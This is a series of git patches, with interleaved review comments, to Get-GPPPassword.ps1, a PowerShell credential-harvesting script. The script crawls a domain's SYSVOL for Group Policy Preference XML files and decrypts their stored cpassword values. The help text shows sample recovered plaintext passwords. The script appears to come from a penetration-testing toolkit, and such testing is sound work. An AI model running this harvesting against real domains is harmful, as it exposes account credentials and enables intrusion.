From 261aaf6302ae590bc4632ee4c95042c2ed1a8a8c Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 15:09:43 -0500 Subject: Update Get-GPPPassword.ps1 Bug fix of variables. --- Exfiltration/Get-GPPPassword.ps1 | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 19959ed..d204197 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.0 + Version: 2.3.1 .DESCRIPTION @@ -124,10 +124,10 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'User'} else {$Replace = "User[$Number]"} - $Cpassword += , $Xml.Groups.User[$Number].Properties.cpassword - $UserName += , $Xml.Groups.User[$Number].Properties.userName - $NewName += , $Xml.Groups.User[$Number].Properties.newName - $Changed += , $Xml.Groups.User[$Number].changed + $Cpassword += , $Xml.Groups.User.$Replace.Properties.cpassword + $UserName += , $Xml.Groups.User.$Replace.Properties.userName + $NewName += , $Xml.Groups.User.$Replace.Properties.newName + $Changed += , $Xml.Groups.User.$Replace.changed } } @@ -136,9 +136,9 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'NTService'} else {$Replace = "NTService[$Number]"} - $Cpassword += , $Xml.NTServices.NTService[$Number].Properties.cpassword - $UserName += , $Xml.NTServices.NTService[$Number].Properties.accountName - $Changed += , $Xml.NTServices.NTService[$Number].changed + $Cpassword += , $Xml.NTServices.NTService.$Replace.Properties.cpassword + $UserName += , $Xml.NTServices.NTService.$Replace.Properties.accountName + $Changed += , $Xml.NTServices.NTService.$Replace.changed } } 
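Review bot: The new `$Xml.Groups.User.$Replace` path repeats the element name, because `$Replace` is `'User'` or `"User[$Number]"`, so the lookup becomes `Groups.User.User`; the same doubled segment appears in the Services hunk on this line (`NTServices.NTService.$Replace`) and in the Task hunk on the next line (`ScheduledTasks.Task.$Replace`). As far as I can tell, a string such as `User[0]` used as a dynamic member name is also resolved literally as a property called `User[0]` rather than as an index, so the multi-entry branch yields `$null` either way. The following commit on this page (313d8037) drops the extra segment for the Groups branch only; indexing the node collection itself, e.g. `@($Xml.Groups.User)[$Number]`, with `@()` covering the single-element case, avoids building member names from strings. The enclosing `switch` and `Get-GppInnerFields` start and end outside these hunks.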
@@ -147,9 +147,9 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'Task'} else {$Replace = "Task[$Number]"} - $Cpassword += , $Xml.ScheduledTasks.Task[$Number].Properties.cpassword - $UserName += , $Xml.ScheduledTasks.Task[$Number].Properties.runAs - $Changed += , $Xml.ScheduledTasks.Task[$Number].changed + $Cpassword += , $Xml.ScheduledTasks.Task.$Replace.Properties.cpassword + $UserName += , $Xml.ScheduledTasks.Task.$Replace.Properties.runAs + $Changed += , $Xml.ScheduledTasks.Task.$Replace.changed } } @@ -217,4 +217,4 @@ function Get-GPPPassword { } catch {Write-Error $Error[0]} -} \ No newline at end of file +} -- cgit v1.2.3 From 313d80373cdfcb769d56eb396bf5c016b2f1b859 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 15:19:55 -0500 Subject: Update Get-GPPPassword.ps1 --- Exfiltration/Get-GPPPassword.ps1 | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index d204197..3c1b4da 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.1 + Version: 2.3.0 .DESCRIPTION 
@@ -124,10 +124,10 @@ function Get-GPPPassword { If (!($Count)) {$Count = 1} ForEach ($Number in 0..($Count - 1)){ If ($Count -eq 1) {$Replace = 'User'} else {$Replace = "User[$Number]"} - $Cpassword += , $Xml.Groups.User.$Replace.Properties.cpassword - $UserName += , $Xml.Groups.User.$Replace.Properties.userName - $NewName += , $Xml.Groups.User.$Replace.Properties.newName - $Changed += , $Xml.Groups.User.$Replace.changed + $Cpassword += , $Xml.Groups.$Replace.Properties.cpassword + $UserName += , $Xml.Groups.$Replace.Properties.userName + $NewName += , $Xml.Groups.$Replace.Properties.newName + $Changed += , $Xml.Groups.$Replace.changed } } -- cgit v1.2.3 From 770fe8ff109a1eaa10da9fb677b634c0dbc8a682 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 15:26:49 -0500 Subject: Update Get-GPPPassword.ps1 Iterate version. --- Exfiltration/Get-GPPPassword.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 3c1b4da..927712b 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.0 + Version: 2.3.1 .DESCRIPTION -- cgit v1.2.3 From 22572d6e7dd6a9aa88f9703cb80ac8cc425ff9e9 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 22:33:27 -0500 Subject: Changed the direction of XML parsing Used Select-XML to ensure compatibility with v2 --- Exfiltration/Get-GPPPassword.ps1 | 133 +++++++++++++++++++-------------------- 1 file changed, 63 insertions(+), 70 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 927712b..4c83b31 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 
@@ -19,29 +19,41 @@ function Get-GPPPassword { PS C:\> Get-GPPPassword - Password : {password12} - Changed : {2014-02-21 05:28:53} - UserName : {test1} - NewName : {} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources - - Password : {Recycling*3ftw!, password123, password1234} - Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} - UserName : {Administrator (built-in), DummyAccount, dummy2} - NewName : {mspresenters, $null, $null} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups - - Password : {password, password1234$} - Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} - UserName : {administrator, admin} - NewName : {} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks - - Password : {password, read123} - Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} - UserName : {DEMO\Administrator, admin} - NewName : {} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services + NewName : {} + Changed : {2014-02-21 05:28:53} + Passwords : {password12} + UserNames : {test1} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml + + NewName : {mspresenters} + Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} + Passwords : {Recycling*3ftw!, password123, password1234} + UserNames : {Administrator (built-in), DummyAccount, dummy2} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml + + NewName : {} + Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} + Passwords : {password, password1234$} + UserNames : {administrator, admin} + File : 
\\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml + + NewName : {} + Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} + Passwords : {password, read123} + UserNames : {DEMO\Administrator, admin} + File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml + +.EXAMPLE + + PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq + + password + password12 + password123 + password1234 + password1234$ + read123 + Recycling*3ftw! .LINK @@ -54,6 +66,9 @@ function Get-GPPPassword { [CmdletBinding()] Param () + #Some XML issues between versions + Set-StrictMode -Version 2 + #define helper function that decodes and decrypts password function Get-DecryptedCpassword { [CmdletBinding()] @@ -102,7 +117,6 @@ function Get-GPPPassword { #$FileObject = Get-ChildItem $File $Filename = Split-Path $File -Leaf - $Filepath = Split-Path $File -Parent [xml] $Xml = Get-Content ($File) #declare empty arrays 
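Review bot: The comment `#Some XML issues between versions` above `Set-StrictMode -Version 2` does not say what strict mode is meant to catch or what the reader should expect from it. Strict mode 2 makes references to uninitialized variables and to non-existent members throw, and because it is set inside `Get-GPPPassword` it applies to this scope and to the nested helper functions; presumably the intent is that member lookups on a preference file lacking a node fail visibly instead of silently yielding `$null` — confirm. Suggest `# Strict mode (v2): fail loudly on undefined variables and missing members instead of silently returning $null; XML member access differs across PowerShell versions`. Note that the same strictness also applies to the variables and `catch` handling later in the function, so a typo'd variable name is now reported as an error rather than ignored.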
@@ -120,48 +134,28 @@ function Get-GPPPassword { switch ($Filename) { 'Groups.xml' { - $Count = $Xml.Groups.User.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'User'} else {$Replace = "User[$Number]"} - $Cpassword += , $Xml.Groups.$Replace.Properties.cpassword - $UserName += , $Xml.Groups.$Replace.Properties.userName - $NewName += , $Xml.Groups.$Replace.Properties.newName - $Changed += , $Xml.Groups.$Replace.changed - } + $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - 'Services.xml' { - $Count = $Xml.NTServices.NTService.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'NTService'} else {$Replace = "NTService[$Number]"} - $Cpassword += , $Xml.NTServices.NTService.$Replace.Properties.cpassword - $UserName += , $Xml.NTServices.NTService.$Replace.Properties.accountName - $Changed += , $Xml.NTServices.NTService.$Replace.changed - } + 'Services.xml' { + $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } 'Scheduledtasks.xml' { - $Count = $Xml.ScheduledTasks.Task.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) 
{$Replace = 'Task'} else {$Replace = "Task[$Number]"} - $Cpassword += , $Xml.ScheduledTasks.Task.$Replace.Properties.cpassword - $UserName += , $Xml.ScheduledTasks.Task.$Replace.Properties.runAs - $Changed += , $Xml.ScheduledTasks.Task.$Replace.changed - } + $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } - 'DataSources.xml' { - $Count = $Xml.DataSources.DataSource.Count - If (!($Count)) {$Count = 1} - ForEach ($Number in 0..($Count - 1)){ - If ($Count -eq 1) {$Replace = 'DataSource'} else {$Replace = "DataSource[$Number]"} - $Cpassword += , $Xml.DataSources.$Replace.Properties.cpassword - $UserName += , $Xml.DataSources.$Replace.Properties.username - $Changed += , $Xml.DataSources.$Replace.changed - } + 'DataSources.xml' { + $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value} + $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value} } } } 
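Review bot: The `Select-Xml "...@attr"` pipelines in each branch return only the attributes that exist, so `$Cpassword`, `$UserName`, `$NewName` and `$Changed` are no longer index-aligned when an attribute is absent on some entries; the updated `.EXAMPLE` in this commit shows it, with three user names but a single `NewName : {mspresenters}` where the old output had `{mspresenters, $null, $null}`. Selecting the element nodes once (e.g. `/Groups/User`) and reading each attribute from that node, emitting `$null` when it is missing, keeps the per-entry correlation; the same applies to the Services, ScheduledTasks and DataSources branches. The leading `,` in `$Cpassword += , $Xml | Select-Xml ...` is applied to `$Xml` before the pipe, where the pipeline unrolls the one-element array again, so as far as I can tell it has no effect and `+=` just appends the flattened values — `$Cpassword += $Xml | Select-Xml ...` says the same thing without suggesting nesting. The `switch` is inside `Get-GppInnerFields`, which starts and ends outside the hunk.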
@@ -173,28 +167,31 @@ function Get-GPPPassword { #append any new passwords to array $Password += , $DecryptedPassword } + + #put [BLANK] in variables + if (!($Password)) {$Password = '[BLANK]'} + if (!($UserName)) {$UserName = '[BLANK]'} + if (!($Changed)) {$Changed = '[BLANK]'} + if (!($NewName)) {$NewName = '[BLANK]'} #Create custom object to output results $ObjectProperties = @{'Passwords' = $Password; 'UserNames' = $UserName; 'Changed' = $Changed; 'NewName' = $NewName; - 'File' = $Filepath} + 'File' = $File} $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties Write-Verbose "The password is between {} and may be more than one value." - Return $ResultsObject - + if ($ResultsObject) {Return $ResultsObject} } catch {Write-Error $Error[0]} - } try { #ensure that machine is domain joined and script is running as a domain account - if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) - { + if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) { throw 'Machine is not a domain member or User is not a member of the domain.' } @@ -202,15 +199,11 @@ function Get-GPPPassword { Write-Verbose 'Searching the DC. This could take a while.' $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml' - if ( -not $XMlFiles ) - { - throw 'No preference files found.' - } + if ( -not $XMlFiles ) {throw 'No preference files found.'} Write-Verbose "Found $($XMLFiles.Count) files that could contain passwords." foreach ($File in $XMLFiles) { - $Result = (Get-GppInnerFields $File.Fullname) Write-Output $Result } -- cgit v1.2.3 From 7ee66855f300bcf32dc12226bcb30acb46cb9972 Mon Sep 17 00:00:00 2001 
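Review bot: The `[BLANK]` defaults change the type of the output properties: `$Password` is an array of values when something was found but becomes the string `'[BLANK]'` otherwise, so a consumer such as the `.EXAMPLE` pipeline `ForEach-Object {$_.passwords}` will list the literal `[BLANK]` among real values, and `Write-Verbose "The password is between {} ..."` is no longer accurate for those records. Leaving the property an (empty) array, or documenting the placeholder value in the help so consumers can filter it, would make the contract consistent. `if ($ResultsObject) {Return $ResultsObject}` is redundant, since `New-Object -TypeName PSObject` always yields an object and the branch therefore always runs; plain `Return $ResultsObject` is clearer. `Get-GppInnerFields` starts outside the hunk.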
From: Chris Campbell Date: Fri, 21 Feb 2014 22:34:11 -0500 Subject: Update Get-GPPPassword.ps1 --- Exfiltration/Get-GPPPassword.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 4c83b31..3ec20f2 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,7 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.3.1 + Version: 2.3.2 .DESCRIPTION -- cgit v1.2.3 From 3047ccfe3290d4000e769be9767399b53a6fb111 Mon Sep 17 00:00:00 2001 From: Chris Campbell Date: Fri, 21 Feb 2014 22:37:23 -0500 Subject: Update Get-GPPPassword.ps1 --- Exfiltration/Get-GPPPassword.ps1 | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) (limited to 'Exfiltration') diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 3ec20f2..454e276 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -19,7 +19,7 @@ function Get-GPPPassword { PS C:\> Get-GPPPassword - NewName : {} + NewName : [BLANK] Changed : {2014-02-21 05:28:53} Passwords : {password12} UserNames : {test1} @@ -31,13 +31,13 @@ function Get-GPPPassword { UserNames : {Administrator (built-in), DummyAccount, dummy2} File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml - NewName : {} + NewName : [BLANK] Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} Passwords : {password, password1234$} UserNames : {administrator, admin} File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml - NewName : {} + NewName : [BLANK] Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} Passwords : {password, read123} UserNames : {DEMO\Administrator, admin} -- cgit v1.2.3